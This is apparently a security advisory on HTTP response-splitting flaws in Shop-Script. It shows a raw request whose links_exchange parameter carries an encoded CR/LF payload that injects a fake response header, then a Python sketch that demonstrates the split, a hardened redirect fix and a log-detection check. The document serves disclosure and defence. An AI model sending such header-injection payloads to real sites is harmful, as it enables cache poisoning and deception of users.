source: https://www.securityfocus.com/bid/20685/info

Shop-Script is prone to multiple HTTP response-splitting vulnerabilities because the application fails to properly sanitize user-supplied input.

A remote attacker may exploit this vulnerability to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that attempt to entice client users into a false sense of trust.

[Request Header]

POST /premium/index.php?links_exchange=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.example.comhttp://www.shop-script-demo.com/
Content-Length: 18
Cookie: PHPSESSID=e0d1c748db4ce6fa7886403e65458aaa
Connection: Close
Pragma: no-cache

current_currency=1

[Response Header]

HTTP/1.1 302 Found
Date: Mon, 16 Oct 2006 17:39:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: index.php?links_exchange=
FakeHeader:Fake_Custom_Header <= [Custom response injected by the attacker]
Content-Length: 0
Connection: close
Content-Type: text/html
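
Added example, not part of the original advisory and not Shop-Script's code: a Python sketch of why the request above yields the extra response header, beside a hardened redirect builder and a check usable on access logs. The function names are hypothetical, and it assumes the application echoes the URL-decoded links_exchange value into Location, as the response above suggests.

```python
from urllib.parse import urlsplit, parse_qsl, quote

# Request target copied from the advisory's [Request Header] section.
TARGET = "/premium/index.php?links_exchange=%0d%0aFakeHeader:Fake_Custom_Header"
PREFIX = "HTTP/1.1 302 Found\r\nLocation: index.php?links_exchange="

def params(target):
    """URL-decode the query string, as the server does before the app sees it."""
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)

def naive_redirect(target):
    """Vulnerable pattern (assumed): decoded value concatenated into Location."""
    return PREFIX + dict(params(target)).get("links_exchange", "") + "\r\n\r\n"

def safe_redirect(target):
    """Hardened pattern: percent-encode the value so CR/LF never reach the wire."""
    value = dict(params(target)).get("links_exchange", "")
    return PREFIX + quote(value, safe="") + "\r\n\r\n"

def header_names(raw_response):
    """Field names as a client or cache would parse them from the header block."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    return [line.split(":", 1)[0] for line in head.split("\r\n")[1:] if ":" in line]

def has_crlf(target):
    """Detection check for access logs or a filter: CR/LF in any decoded name or value."""
    return any(c in part for pair in params(target) for part in pair for c in "\r\n")

if __name__ == "__main__":
    print(header_names(naive_redirect(TARGET)))  # two fields: the value split the header
    print(header_names(safe_redirect(TARGET)))   # one field: the value stayed inside Location
    print(has_crlf(TARGET))
```

Rejecting the request outright when has_crlf() is true is an equally valid fix; re-encoding is shown because it keeps the redirect working for legitimate values.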